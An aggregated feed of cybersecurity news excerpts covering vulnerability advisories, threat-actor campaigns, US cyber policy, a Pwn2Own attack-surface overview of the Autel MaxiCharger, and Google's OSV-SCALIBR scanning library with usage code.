by ComputerWeekly

A highly targeted cyber-intelligence campaign adds fuel to the increasingly complex relationship between the two former Soviet states.

by Dark Reading

Building on the feedback from our 3.2M+ cybersecurity professionals and addressing industry challenges, we’re thrilled to share the latest Hack The Box updates from the past three months!

by Hack The Box Blog

CVE-2025-0282 and CVE-2025-0283 affect multiple Ivanti products. This threat brief covers attack scope, including details from an incident response case. The post Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated Jan. 17) appeared first on Unit 42.

by Palo Alto Networks - Unit42

A breach of AT&T that exposed “nearly all” of the company’s customers may have included records related to confidential FBI sources, potentially explaining the bureau’s new embrace of end-to-end encryption.

by WIRED Security News

New order mandates securing the federal software supply chain and communications networks, as well as deploying AI tools to protect critical infrastructure from cyberattacks — but will the Trump administration follow through?

by Dark Reading

The Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims'' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection. ""Star Blizzard''s targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations

by The Hacker News

by Dark Reading

by Dark Reading

by Dark Reading

This blog post advises on how security teams can move to autonomous detection and investigation of novel threats, reducing alert fatigue, and enabling tailored, real-time threat response.

by Darktrace

by Dark Reading

Residents across the United States are being inundated with text messages purporting to come from toll road operators like E-ZPass, warning that recipients face fines if a delinquent toll fee remains unpaid. Researchers say the surge in SMS spam coincides with new features added to a popular commercial phishing kit sold in China that makes it simple to set up convincing lures spoofing toll road operators in multiple U.S. states.

by Krebs on Security

The FTC claims that the Web hosting company''s security failures led to several major breaches in the past few years.

by Dark Reading

In one of his final acts in office, outgoing President Joe Biden on Thursday issued an ambitious order outlining plans to improve U.S. government cybersecurity – including demanding better security from software and cloud companies. The lengthy Biden cybersecurity order builds on plans that began nearly four years ago in the wake of the Colonial Pipeline ransomware attack. It comes during a week when his top cybersecurity officials  – including CISA officials Jen Easterly and David Mussington and U.S. cyberspace ambassador Nathaniel Fick – have been urging the incoming Trump Administration to continue the fight against cyber threats and disinformation from Russia, China and others. Mussington also cited climate change as a threat to critical infrastructure resilience. In other last-minute moves by the Biden Administration, the U.S. held an informal UN Security Council meeting on efforts to stop the spread of spyware, and Biden himself took aim at the “tech industrial complex” and its effect on disinformation and “extreme wealth” in his farewell address on January 15. The incoming Trump Administration’s approach to cybersecurity and other issues remains to be seen, but the Biden executive order is noteworthy for the lessons his Administration learned in four tumultuous years for cybersecurity. Biden Cybersecurity Order Includes Software, Cloud Security Biden’s final cybersecurity plan lays out ambitious goals – and an equally ambitious timeline, as many of the directives would be implemented within a year. NIST, CISA, the OMB, and the Federal Acquisition Regulatory Council (FAR Council) would develop contract language requiring software providers to attest and validate that they use secure software development practices. Open source software will also be examined, with CISA, the OMB and the GSA developing “recommendations to agencies on the use of security assessments and patching of open source software and best practices for contributing to open source software projects.” Federal government contractors would be required to “follow applicable minimum cybersecurity practices identified” by NIST “when developing, maintaining, or supporting IT services or products that are provided to the Federal Government.” FedRAMP policies and practices would be developed for cloud service providers in the FedRAMP Marketplace to create “baselines with specifications and recommendations for agency configuration of agency cloud-based systems in order to secure Federal data based on agency requirements.” IAM, Post-Quantum Encryption Among Biden''s Goals Biden’s order instructs the federal government to “adopt proven security practices from industry — to include in identity and access management — in order to improve visibility of security threats across networks and strengthen cloud security.” Pilot tests for commercial phishing-resistant standards such as WebAuthn are among the requirements for federal agencies, along with post-quantum cryptography (PQC) key establishment (or a hybrid that includes a PQC algorithm) “as soon as practicable upon support being provided by network security products and services already deployed in their network architectures.” Secure management of access tokens and cryptographic keys used by cloud service providers are another requirement. CISA will also lead development of “the technical capability to gain timely access to required data” from agencies’ EDR solutions and security operation centers to enable rapid threat hunting. BGP security shortcomings would be addressed with requirements for ISPs to deploy Internet routing security technologies such as Route Origin Authorizations, Route Origin Validation, route leak mitigation and source address validation. Encryption would be required for DNS traffic, email, video conferencing and instant messaging. Digital Identities ''Encouraged'' by Biden Order The order also would “strongly encourage the acceptance of digital identity documents to access public benefits programs that require identity verification, so long as it is done in a manner that preserves broad program access for vulnerable populations and supports the principles of privacy, data minimization, and interoperability.” Agencies would work with states to develop and issue mobile driver’s licenses to meet that goal, along with identity fraud reporting. AI Cybersecurity Innovation and Controls AI “has the potential to transform cyber defense by rapidly identifying new vulnerabilities, increasing the scale of threat detection techniques, and automating cyber defense,” the Biden order states. “The Federal Government must accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity.” Those efforts would begin with a pilot program “on the use of AI to enhance cyber defense of critical infrastructure in the energy sector.” That pilot program may include vulnerability detection, automated patch management, and “the identification and categorization of anomalous and malicious activity across information technology (IT) or operational technology systems.” That would be followed by a Department of Defense program “to use advanced AI models for cyber defense.” The order also asks agencies to prioritize research on the following topics: human-AI interaction methods to assist defensive cyber analysis AI coding security assistance, including security of AI-generated code methods for designing secure AI systems methods for “prevention, response, remediation, and recovery of cyber incidents involving AI systems.” Secure Architecture a Long-Term Goal One of the few long-term goals in the order is a requirement that within three years, the Director of OMB would issue guidance “to address critical risks and adapt modern practices and architectures across Federal information systems and networks.” That includes, at a minimum, zero trust architectures, EDR capabilities, encryption, network segmentation, and phishing-resistant multi-factor authentication. One last requirement calls for agencies to assess “risks to mission-essential functions presented by concentration of IT vendors and services.” The Biden order applies to federal civilian agencies but not National Security Systems (NSS). However, NSS and “debilitating impact systems” would also be required to develop requirements “that are consistent with the requirements set forth in this order.”

by The Cyber Express

Bill discusses how to find ''the helpers'' and the importance of knowledge sharing. Plus, there''s a lot to talk about in our latest vulnerability roundup.

by Cisco Talos Blog

Subdomain takeover is a serious risk for organizations with a large online presence (which is a lot of businesses in 2025!). A domain name is the starting point of your company’s online identity, encompassing the main and subsidiary websites—serving as the organization’s business card, storefront, and a central hub for commercial activities. For SaaS providers […] The post How to protect your site from subdomain takeover appeared first on Outpost24.

by Outpost24

Resurrecting Shift-Left With Human-in-the-loop AI Alex Rice Thu, 01/16/2025 - 10:28 Body What’s Needed for Secure by Design SuccessWe spent years understanding the culprits of why “shift-left” controls fail to identify the principles needed for them to succeed. Success starts with a developer-first foundation and a discipline to eliminate work vs. create it.The Developer-first Application Security FoundationTo guide developers to write secure code, they need to be armed with actionable information. In fact, use “actionable” interchangeably with “useful.”The key ingredients for actionability are context, speed, and low-noise output. It needs to be focused, fast, and understand what’s being analyzed. Static Application Security Testing (SAST) and Software Composition Analysis (SCA) tools are fast but fall short on context and noise. The problem is how often they’re not right—bombarding developers with false positives and duplicate warnings.The source of information needs to continuously learn. A process is doomed for failure if developers need to constantly explain their work and escalate exceptions. Developer security tools need to listen, watch, and adapt without intervention. If application security listens to developers and provides value, developers respond by listening and learning back.When application security activates in development, it should be non-blocking. Blocking mechanisms bring development—and everything else—to a halt. They incentivize creative bypasses, not secure code. Applying preventative safeguards is important, but overburdening developers because they work on the pre-production side of the SDLC is hardly a balanced defense-in-depth strategy.Finally, security can’t just make noise at developers. Remediation needs to be part of the solution. To address issues that arise, there needs to be interactive support throughout the lifecycle.Where “Shift Left” Went WrongEfforts to introduce security testing earlier in the SDLC usually begin with applying SAST (and IAST, DAST, SCA, RASP, etc.) scanners. These are fast and, because of broad compatibility with most programming languages, theoretically scalable. The problem is the work it takes to prove their output is right or wrong, leading to compounding backlogs. And upon examination, they’re often wrong, leading to security policies developers don’t trust. It’s here where application security in development stalls: trying to make a dysfunctional policy work (as security debt grows).None of this is to say security code scanners aren’t powerful and valuable. Their maintainers, whose work has done the world a great service, never claimed for them to stand as a single strategy. “Shift left” failed developers as a well-intended, unspoken hope that there’d be an easy fix to a hard problem.The Future of Developer Security with AIScanners are limited when it comes to things like understanding massive legacy codebases, identifying misuse of functionality in microservice architectures, and finding flaws related to code not written. Here, AI shines and the future looks bright. Models, trained on corpuses of training data, are capable of analyzing entire codebases. Secure code systems can flag areas that deviate from normal patterns. Great news for developers and security engineers who have carried 100% of the manual secure code review burden for years.Is AI alone the solution to right what “shift left” got wrong?Embarking on these opportunities made possible with AI, it’s important to remember technology is a tool, not a replacement for invaluable human expertise.Human-AI CollaborationRethinking “shift-left” security strategy by incorporating AI technology is exciting, but warrants safe and responsible exploration. Execution of deployment requires human-in-the-loop (HITL) oversight as a governing principal. Conventionally, objectives of a HITL methodology are to improve the models they oversee—ensuring AI systems are accurate, robust, ethical, adaptable, and align with real-world goals.Let’s challenge conventional thinking.Instead of prioritizing the efficacy of AI systems, what if human-in-the-loop oversight priorities begin and end with helping a developer write secure code? What if human experts can not only categorize model output as “right” or ""wrong,” but expand on what’s “right” so it’s actionable with all of the context details taken into account? What if they’re a teammate who can help a developer on a problem-solving journey of taking action to remediate?Let’s Resurrect Shift-Left SecurityCheck out the on-demand webinar during which we discuss how a human-AI collaborative approach transforms security from a dreaded blocker into a powerful enabler of development velocity.Broken Security Promises: How Human-AI Collaboration Rebuilds Developer TrustOriginally aired on Jan. 16, 2025 @ 12pm ETStay tuned for more insights into how HackerOne is working with dev teams to reinvent secure development together.  Excerpt Let''s explore how human-in-the-loop AI can help implement successful secure-by-design. Main Image

by HackerOne

Box, Inc. specialises in developing and marketing cloud-based content management, collaboration, and file-sharing tools for businesses. While Box’s services are... The post Extending Falco for Box appeared first on Sysdig.

by Sysdig

AttackIQ has released an updated attack graph in response to the recently revised CISA Advisory (AA23-136A) that disseminates known BianLian ransomware group Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) identified through the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA) and the Australian Cyber Security Centre (ACSC) investigations. The post Updated Response to CISA Advisory (AA23-136A): #StopRansomware: BianLian Ransomware Group appeared first on AttackIQ.

by AttackIQ

The digital world is exploding. IoT devices are multiplying like rabbits, certificates are piling up faster than you can count, and compliance requirements are tightening by the day. Keeping up with it all can feel like trying to juggle chainsaws while riding a unicycle. Traditional trust management? Forget it. It''s simply not built for today''s fast-paced, hybrid environments. You need a

by The Hacker News

Get details on this new cybersecurity Executive Order and its implications. 

by Legit Security

Gartner analysts discuss how agentic AI will transform business operations by 2028, while also raising the risk of cyberattacks.

by ITPro Today

by ComputerWeekly

Open-source intelligence reveals the server-side code of this pernicious SEO-driven malware - without needing a lawyer afterward

by Sophos News

You can tell the story of the current state of stolen credential-based attacks in three numbers: Stolen credentials were the #1 attacker action in 2023/24, and the breach vector for 80% of web app attacks. (Source: Verizon). Cybersecurity budgets grew again in 2024, with organizations now spending almost $1,100 per user (Source: Forrester).  Stolen credentials on criminal forums cost as

by The Hacker News

Details have emerged about a now-patched security vulnerability that could allow a bypass of the Secure Boot mechanism in Unified Extensible Firmware Interface (UEFI) systems. The vulnerability, assigned the CVE identifier CVE-2024-7344 (CVSS score: 6.7), resides in a UEFI application signed by Microsoft''s ""Microsoft Corporation UEFI CA 2011"" third-party UEFI certificate, according to a new

by The Hacker News

Cybersecurity researchers have found that the Microsoft Active Directory Group Policy that''s designed to disable NT LAN Manager (NTLM) v1 can be trivially bypassed by a misconfiguration. ""A simple misconfiguration in on-premise applications can override the Group Policy, effectively negating the Group Policy designed to stop NTLMv1 authentications,"" Silverfort researcher Dor Segal said in a

by The Hacker News

Threat actors have been observed concealing malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer as part of separate campaigns. ""In both campaigns, attackers hid malicious code in images they uploaded to archive[.]org, a file-hosting website, and used the same .NET loader to install their final payloads,"" HP Wolf Security said in its Threat Insights Report

by The Hacker News

Businesses are turning to innovative BPO strategies powered by AI, automation, and data-driven insights to streamline operations, reduce costs, and deliver personalized customer experiences in 2025.

by ITPro Today

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Introduction to PowerShell What Is PowerShell? PowerShell is a powerful command-line shell that supports scripting languages and provides tools for managing computer resources locally and remotely. Benefits of PowerShell for Windows Administration Windows PowerShell commands enable automation of repetitive tasks such as managing users, services, files, or scripts. PowerShell can also be used for managing … Continued

by Netwrix

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.The Invoke-Command cmdlet in PowerShell enables IT admins to execute commands and scripts on remote machines, and even to redirect the output of those remote scripts to their own console. As a result, they can manage multiple machines from a central location. Key use cases include: Invoke-Command offers all of the following valuable capabilities: Benefits … Continued

by Netwrix

by ComputerWeekly

Previously, we covered the internals of the Autel MaxiCharger where we highlighted each of the main components. In this post, we aim to outline the attack surface of the MaxiCharger in the hopes of providing inspiration for vulnerability research.All information has been obtained through reverse engineering, experimenting, and combing through the Autel MaxiCharger manual (PDF).At the time of writing the following software versions were applicable:·      Autel Charge app v3.0.7·      Autel Config app v2.1.0·      Autel MaxiCharger modules: ·      Charge Control v1.36.00 ·      Power Control v1.21.00 ·      LCD Control v0.99.31 ·      LCD Information v0.99.08 ·      LCD Resources v0.99.08 ·      LCD Languages v0.04.04Mobile ApplicationsAutel has published two mobile applications for both Android and iOS. The main app is called Autel Charge and contains functionality intended for end users. Some of the features include:·      Defining charging schedules·      Load balancing·      Providing Wi-Fi credentials for the charger to use·      Forcing firmware updates·      OCPP server selection (including custom servers)·      Current limiting·      Finding other chargers on a map·      Checking charger version informationUpon loading the app on a rooted Android device a superuser request can be seen. This was unexpected and points towards the app employing anti-reversing measures. Denying the request loads the app normally. Figure 1: Autel Charge superuser request After denying the superuser request a new Autel account can be created using an email address.The second app is named Autel Config and allows installers / technicians to configure chargers and manage tickets. Unlike the Autel Charge app, there is no option to register for an account and providing Autel Charge account credentials doesn''t work. This suggests that installers / technicians have some other way of obtaining valid credentials.Further research into these apps could be valuable to better understand how the apps and charger communicate. Network Traffic AnalysisUsing the Autel Charge app the MaxiCharger was configured to connect to a researcher controlled Wi-Fi network in order to monitor the network traffic. The app and charger were then left idling whilst the traffic was captured. A few DNS requests were sent out from the charger (192.168.200.66) for Autel related infrastructure. Figure 2: Charger DNS queries The first query was for gateway-eneprodus.autel.com which is an alias of eneprodus-alb-internet-2014464356.us-west-2.elb.amazonaws.com. This resolved to the following IP addresses (shown in the order received):        • 54.185.127.160       • 52.36.153.97       • 44.240.206.177       • 34.215.58.124 Straight after the first DNS query response a TLS session was set up and encrypted data was sent by the charger on port 443 to 54.185.127.160. Data was sent back and forth between the charger and server a few times before another DNS query was sent. The charger issued another query for gateway-eneprodus.autel.com which, as before, is an alias and returned the same IP addresses but in a different order presumably due to load balancing. This time the DNS query returned the IP addresses:        • 34.215.58.124       • 44.240.206.177       • 54.185.127.160       • 52.36.153.97 Like previously, the charger used the first IP address that was returned but this time no TLS session was set up. Plain HTTP was used. Figure 3: HTTP traffic Looking a bit closer showed the charger periodically sending log data to the Autel server. The server always responded with JSON that had a null data value, a 200 code value and a message value of OK. Figure 4: HTTP POST traffic After a while the charger made another DNS request for gateway-eneprodus.autel.com, this time the 44.240.206.177 IP address was returned first. The charger then sent a HTTP POST to /api/app-version-manager/version/upgrade/ota with device related details such as the serial number and current firmware version. The server responded with JSON containing firmware update related information including a URL to download the latest version. Figure 5: HTTP firmware related traffic The charger then proceeded to send a DNS request for s3.us-west-2.amazonaws.com and directly downloaded the firmware update over HTTP. The same pattern was observed multiple times as the device downloaded firmware updates for each of its modules. A list of these modules and their versions can be viewed in the Autel Charge app by navigating to the Charger Info page. Figure 6: MaxiCharger module versions After the firmware was updated and the charger rebooted no further HTTP traffic was observed to the logging or firmware update endpoint, instead only HTTPS was used.Port scanning the charger over Wi-Fi showed no open TCP or UDP ports however UDP ports 6000 and 6666 appear to be listening over the Ethernet interface. The Ethernet interface is a valid target for the competition so these 2 listening services may be worth researching further.Bluetooth Low EnergyBy default the MaxiCharger uses the device serial number as the device name when advertising over Bluetooth. Once connected there are 4 available services that offer a total of 14 characteristics. Autel Charge uses these endpoints to communicate with the charger. A dump of each service and associated characteristics is shown below. Further research into Autel Charge and Autel Config will likely assist in understanding the bluetooth services better.FirmwareAs mentioned in the previous blog the main microcontroller has readout protection enabled however this can be bypassed using techniques covered in Jonathan Andersson''s and Thanos Kaliyanakis'' Blackhat EU talk. Keep an eye out for future blog posts that will cover these techniques. One of which doesn''t require glitching!The main firmware can also be acquired by sniffing the charger update process (as described in the Network Traffic Analysis section) or by reversing the app to figure out the download URLs. The firmware of ESP32 WROOM 32D module can be dumped using the standard esptool.py from Espressif. During research it was noted that the esptool.py would sometimes fail to dump the full firmware image. To mitigate this the firmware can be dumped in smaller chunks and then stitched back together into a single blob. Other Potential Attack SurfacesThere are a few other attack surfaces that are considered in scope and are worth mentioning. One of these is the undocumented USB C port that can be found behind a small panel on the side of the unit. There is no publicly available information about what this USB port is used for.Also, next to the USB port is the SIM card tray. Attacks that utilize a SIM card are also considered to be in scope.And finally, there is the RFID (NFC) reader.SummaryHopefully this blog post provides enough information to kickstart vulnerability research against the Autel MaxiCharger. We are looking forward to Pwn2Own Automotive again in Tokyo in January 2025 at Automotive World, and we will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions and register! We hope to see you there.You can find me on Twitter at @ByteInsight, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

The best password managers provide security, privacy, and ease of use for a reasonable price. We tested the best ones to help you find what''s best for your family.

by ZDNET Security

Avery has confirmed its website was compromised by a credit card skimmer that potentially affected over 60,000 customers.

by Malwarebytes Labs

In cybersecurity, email has always been a critical concern. However, we feel the new 2024 Gartner® Magic Quadrant for Email Security Platforms™ has signaled a shift in how we approach email protection.

by KnowBe4

Here we go again, discussing Active Directory, hacking, and detection engineering. tl;dr: One AD account can provide you with three detections that if implemented properly will catch common adversarial activities […] The post One Active Directory Account Can Be Your Best Early Warning appeared first on Black Hills Information Security.

by Black Hills Information Security

By staying vigilant, agile, and prepared, organizations can turn TDIR from a defensive strategy into a proactive enabler of security and operational excellence.

by Dark Reading

Wolf Haldenstein Adler Freeman & Herz LLP, a prominent U.S. law firm, has disclosed a data breach affecting nearly 3.45 million individuals. The breach, caused by an external hacking incident, compromised sensitive personal and medical information. The firm first detected suspicious network activity on December 13, 2023, and took immediate steps to secure its systems. … The post Wolf Haldenstein Data Breach Exposed 3.5 Million Americans appeared first on CyberInsider.

by Cyber Insider

Part predictive analysis, part intuition, risk and reputation services are imperfect instruments at best — and better than nothing for most organizations and insurers.

by Dark Reading

New Let''s Encrypt and regional support.

by Sophos News

An employee at a telecommunications company connected as usual to their cloud account. They then appeared to travel a distance of 361 km, roughly 225 miles, at nearly twice the speed of sound before logging in again.

by Barracuda

Posted by Erik Varga, Vulnerability Management, and Rex Pan, Open Source Security TeamIn December 2022, we announced OSV-Scanner, a tool to enable developers to easily scan for vulnerabilities in their open source dependencies. Together with the open source community, we’ve continued to build this tool, adding remediation features, as well as expanding ecosystem support to 11 programming languages and 20 package manager formats. Today, we’re excited to release OSV-SCALIBR (Software Composition Analysis LIBRary), an extensible library for SCA and file system scanning. OSV-SCALIBR combines Google’s internal vulnerability management expertise into one scanning library with significant new capabilities such as:SCA for installed packages, standalone binaries, as well as source codeOSes package scanning on Linux (COS, Debian, Ubuntu, RHEL, and much more), Windows, and MacArtifact and lockfile scanning in major language ecosystems (Go, Java, Javascript, Python, Ruby, and much more)Vulnerability scanning tools such as weak credential detectors for Linux, Windows, and MacSBOM generation in SPDX and CycloneDX, the two most popular document formatsOptimization for on-host scanning of resource constrained environments where performance and low resource consumption is criticalOSV-SCALIBR is now the primary SCA engine used within Google for live hosts, code repos, and containers. It’s been used and tested extensively across many different products and internal tools to help generate SBOMs, find vulnerabilities, and help protect our users’ data at Google scale.We offer OSV-SCALIBR primarily as an open source Go library today, and we''re working on adding its new capabilities into OSV-Scanner as the primary CLI interface.Using OSV-SCALIBR as a libraryAll of OSV-SCALIBR''s capabilities are modularized into plugins for software extraction and vulnerability detection which are very simple to expand.You can use OSV-SCALIBR as a library to:1.Generate SBOMs from the build artifacts and code repos on your live host:import ( ""context"" ""github.com/google/osv-scalibr"" ""github.com/google/osv-scalibr/converter"" ""github.com/google/osv-scalibr/extractor/filesystem/list"" ""github.com/google/osv-scalibr/fs"" ""github.com/google/osv-scalibr/plugin"" spdx ""github.com/spdx/tools-golang/spdx/v2/v2_3"")func GenSBOM(ctx context.Context) *spdx.Document { capab := &plugin.Capabilities{OS: plugin.OSLinux} cfg := &scalibr.ScanConfig{   ScanRoots: fs.RealFSScanRoots(""/""),   FilesystemExtractors: list.FromCapabilities(capab),   Capabilities: capab, } result := scalibr.New().Scan(ctx, cfg) return converter.ToSPDX23(result, converter.SPDXConfig{})}2. Scan a git repo for SBOMs:Simply replace ""/"" with the path to your git repo. Also take a look at the various language extractors to enable for code scanning.3. Scan a remote container for SBOMs:Replace the scan config from the above code snippet withimport ( ... ""github.com/google/go-containerregistry/pkg/authn"" ""github.com/google/go-containerregistry/pkg/v1/remote"" ""github.com/google/osv-scalibr/artifact/image"" ...)...filesys, _ := image.NewFromRemoteName( ""alpine:latest"", remote.WithAuthFromKeychain(authn.DefaultKeychain),)cfg := &scalibr.ScanConfig{ ScanRoots: []*fs.ScanRoot{{FS: filesys}}, ...}4. Find vulnerabilities on your filesystem or a remote container:Extract the PURLs from the SCALIBR inventory results from the previous steps:import ( ... ""github.com/google/osv-scalibr/converter"" ...)...result := scalibr.New().Scan(ctx, cfg)for _, i := range result.Inventories { fmt.Println(converter.ToPURL(i))}And send them to osv.dev, e.g.$ curl -d ''{""package"": {""purl"": ""pkg:npm/dojo@1.2.3""}}'' ""https://api.osv.dev/v1/query""See the usage docs for more details.OSV-Scanner + OSV-SCALIBRUsers looking for an out-of-the-box vulnerability scanning CLI tool should check out OSV-Scanner, which already provides comprehensive language package scanning capabilities using much of the same extraction as OSV-SCALIBR. Some of OSV-SCALIBR’s capabilities are not yet available in OSV-Scanner, but we’re currently working on integrating OSV-SCALIBR more deeply into OSV-Scanner. This will make more and more of OSV-SCALIBR’s capabilities available in OSV-Scanner in the next few months, including installed package extraction, weak credentials scanning, SBOM generation, and more.Look out soon for an announcement of OSV-Scanner V2 with many of these new features available. OSV-Scanner will become the primary frontend to the OSV-SCALIBR library for users who require a CLI interface. Existing users of OSV-Scanner can continue to use the tool the same way, with backwards compatibility maintained for all existing use cases. For installation and usage instructions, have a look at OSV-Scanner’s documentation here.What’s nextIn addition to making all of OSV-SCALIBR’s features available in OSV-Scanner, we''re also working on additional new capabilities. Here''s some of the things you can expect:Support for more OS and language ecosystems, both for regular extraction and for Guided RemediationLayer attribution and base image identification for container scanningReachability analysis to reduce false positive vulnerability matchesMore vulnerability and misconfiguration detectors for WindowsMore weak credentials detectorsWe hope that this library helps developers and organizations to secure their software and encourages the open source community to contribute back by sharing new plugins on top of OSV-SCALIBR.If you have any questions or if you would like to contribute, don''t hesitate to reach out to us at osv-discuss@google.com or by posting an issue in our issue tracker.

by Google Security Blog

The Russia-linked ransomware group is threatening to leak data stolen from almost 60 Cleo Software customers if ransoms aren''t paid © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Learn about the all-new third-party log sources and multilingual question support features just released for SentinelOne''s Purple AI. The post New Possibilities with Purple AI | Third-Party Log Sources & Multilingual Question Support appeared first on SentinelOne.

by SentinelOne

Check out the 52 new pieces of training content added in December, alongside the always fresh content update highlights, new features and events. 

by KnowBe4

As we near the end of 2024, ransomware remains a dominant and evolving threat against any organization. Cyber criminals are more sophisticated and creative than ever. They integrate new technologies, leverage geopolitical tensions and even use legal regulations to their advantage. What once seemed like a disruptive but relatively straightforward crime has evolved into a […] The post The current state of ransomware: Weaponizing disclosure rules and more appeared first on Security Intelligence.

by Security Intelligence

Overview  Ukraine''s fight against cyberthreats has reached new heights, with its top cybersecurity agency releasing the 2024 annual cyberthreat landscape report detailing its efforts to protect critical infrastructure and government systems.   The report, prepared by the State Cyber Defense Center under the State Service for Special Communications and Information Protection, outlines key findings, incident statistics, and strategies employed to counteract persistent cyber threats.  Key Findings  Ukraine processed a staggering 3 million security events in 2024, a reflection of the heightened activity in its cyber domain. Of these, over 1,000 incidents were confirmed as direct cyberthreats.   The year saw a surge in advanced persistent threats (APTs) and state-sponsored cyber espionage campaigns, with attackers leveraging legitimate services to obfuscate their malicious activities.  Malware Dominance: Over 58% of incidents involved malicious software, ranging from ransomware to spyware designed for prolonged infiltration. These attacks targeted data exfiltration and operational disruption.  Sectoral Breakdown: Government agencies accounted for 90% of reported incidents, making them a primary target for the year. The energy sector, critical to Ukraine’s resilience, and the defense sector, pivotal in ongoing geopolitical conflicts, also faced significant threats.  Primary Attack Vectors: Phishing campaigns remained the predominant method of attack. Threat actors exploited spear-phishing emails laden with malicious attachments or links, leveraging human error as an entry point.  The Major Threat Clusters  Ukraine identified three major threat actor clusters, each with distinct methodologies and objectives that remained most active in the year gone by:  UAC-0010 (Gamaredon/Trident Ursa):  Activity: Conducted over 270 documented incidents in 2024.  Tactics: Utilized tailored malware delivery mechanisms, including infected removable media and phishing emails.  Targets: Government institutions, military organizations, and diplomatic entities.  Objective: Cyber espionage aimed at gathering intelligence on Ukraine’s governance and defense.  UAC-0006:  Activity: Responsible for 174 attacks, particularly in the financial sector.  Tactics: Employed SmokeLoader malware to infiltrate systems and extract sensitive data.  Objective: Financial gain through data theft and subsequent ransom demands.  UAC-0050:  Activity: Linked to 99 incidents with a mix of espionage and sabotage.  Tactics: Relied heavily on phishing and malware propagation via compromised email accounts.  Objective: Espionage with a secondary focus on spreading disinformation.  Advanced Tools and Techniques  To combat increasingly sophisticated threats, Ukraine’s SOC deployed a range of advanced tools and methodologies:  Network Detection and Response (NDR): SOC teams monitored anomalies in traffic patterns across 69 sensors strategically placed in critical networks. These sensors facilitated early detection of intrusions.  Endpoint Detection and Response (EDR): Secured over 28,000 devices, providing a critical layer of defense against endpoint-based attacks.  Attack Surface Management (ASM): Regular scans of over 1,200 assets enabled the identification and mitigation of vulnerabilities before they could be exploited.  SOAR and AI Integration: The integration of Security Orchestration, Automation, and Response (SOAR) with AI algorithms streamlined incident response processes, reducing detection-to-remediation times significantly.  Sector Specific Insights  Ukraine’s cyber agency’s analysis provides a granular view of the sectors most impacted by cyber threats:  Government Agencies: As the backbone of Ukraine’s operational and strategic initiatives, government networks faced relentless attacks. Over 90% of incidents were concentrated here, ranging from attempts to steal classified information to disruptions in communication systems.  Energy Sector: With Ukraine’s energy infrastructure being a critical target, adversaries focused on disrupting power grids and supply chains, aiming to weaken national stability.  Defense Sector: Sophisticated attacks aimed to infiltrate military communications and logistics systems, compromising national security.  Recommendations for Enhanced Cyber Resilience  Ukraine’s cyberthreat landscape suggests a multi-layered approach to cybersecurity, advocating for the following measures:  Regular Software Updates: Ensure that all systems, software, and firmware are updated promptly to address known vulnerabilities.  Advanced Email Security: Deploy filters to detect and block phishing attempts, and train employees to recognize suspicious communications.  Comprehensive Endpoint Protection: Utilize advanced antivirus and EDR solutions to secure devices against malware and unauthorized access.  Network Segmentation: Isolate critical systems from less secure areas to limit the scope of potential breaches.  Multi-Factor Authentication (MFA): Enforce MFA across all user accounts to bolster identity verification processes.  Incident Response Plans: Develop and regularly test robust incident response protocols to ensure rapid recovery from cyber events.  Continuous Monitoring: Leverage SIEM tools and log analysis to detect and respond to anomalies in real-time.  The Path Forward  Ukraine’s annual cyberthreat landscape report 2024 shows the dynamic and persistent nature of cyberthreats that the country is facing. The integration of advanced technologies and proactive collaboration with international allies has significantly enhanced the nation’s cyber defense capabilities. However, the evolving tactics of adversaries demand an equally adaptive and forward-looking approach.  As Ukraine continues to navigate its geopolitical challenges, the role of cybersecurity in safeguarding national sovereignty and infrastructure remains paramount. By fostering a culture of resilience and collaboration, Ukraine is setting an example for global cybersecurity efforts, proving that even under relentless attack, robust defenses can prevail.  References:  https://scpc.gov.ua/api/files/72e13298-4d02-40bf-b436-46d927c88006https://www.cip.gov.ua/ua/news/sistema-viyavlennya-vrazlivostei-i-reaguvannya-na-kiberincidenti-ta-kiberataki-dckz-dopomogla-viyaviti-ta-opracyuvati-1042-kiberincidenti-u-2024-roci The post Government Sector Bears the Brunt of Cyberattacks in Ukraine: Report  appeared first on Cyble.

by CYBLE

 

by Code Intelligence

Cybersecurity researchers have detailed an attack that involved a threat actor utilizing a Python-based backdoor to maintain persistent access to compromised endpoints and then leveraged this access to deploy the RansomHub ransomware throughout the target network. According to GuidePoint Security, initial access is said to have been facilitated by means of a JavaScript malware downloaded named

by The Hacker News

Ivanti has rolled out security updates to address several security flaws impacting Avalanche, Application Control Engine, and Endpoint Manager (EPM), including four critical bugs that could lead to information disclosure. All the four critical security flaws, rated 9.8 out of 10.0 on the CVSS scale, are rooted in EPM, and concern instances of absolute path traversal that allow a remote

by The Hacker News

European privacy advocacy group noyb has filed six General Data Protection Regulation (GDPR) complaints against major Chinese tech companies, including TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi, for allegedly transferring Europeans'' personal data to China in violation of EU law. The complaints, lodged in five different countries, argue that China''s authoritarian surveillance state lacks adequate … The post GDPR Complaints Filed Against TikTok, Xiaomi, Over Data Transfers appeared first on CyberInsider.

by Cyber Insider

Shorter SSL certificate validity periods enhance digital security by reducing risks like private key compromise, misissuance, and revocation delays. They align certificate ownership with domain control, encourage crypto agility, and address limitations of current revocation methods. Short validity periods also promote automation, streamline renewal processes, and future-proof systems against evolving cybersecurity challenges. While increased renewal frequency poses challenges, adopting automated solutions can mitigate risks and ensure seamless management.

by Sectigo

Nathaniel Fick, the ambassador for cyberspace and digital policy, has led US tech diplomacy amid a rising tide of pressure from authoritarian regimes. Will the Trump administration undo that work?

by WIRED Security News

Technology is changing the global economy, and fintech companies are at the backbone of this transformation. To keep…

by Hackread

Over a dozen programs used by creators of nonconsensual explicit images have evaded detection on the developer platform, WIRED has found.

by WIRED Security News

Seven system recovery programs contained what amounted to a backdoor for injecting any untrusted file into the system startup process.

by Dark Reading

